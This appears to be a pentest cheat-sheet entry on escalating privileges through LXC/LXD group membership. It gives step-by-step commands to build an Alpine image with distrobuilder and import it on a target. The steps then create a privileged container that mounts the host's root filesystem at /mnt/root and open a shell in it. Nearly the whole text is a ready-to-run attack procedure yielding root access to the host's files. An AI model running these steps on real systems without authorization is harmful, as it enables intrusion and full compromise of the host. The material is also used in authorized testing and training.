LXC membership
On the attacker machine, install distro builder projet:
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
lxd.tar.xz and rootfs.squashfs are built. Upload them on the vulnerable machine.
From the vulnerable machine, add the Alpine image as follows:
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image
Then, create a container from this imported LXC image and add root path:
lxc init alpine privesc -c security.privileged=true --alias=alpine
lxc list #List containers
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Finally, run the container:
lxc start privesc
lxc exec privesc /bin/sh
Host filesystem can be accessed from /mnt/root.
Last updated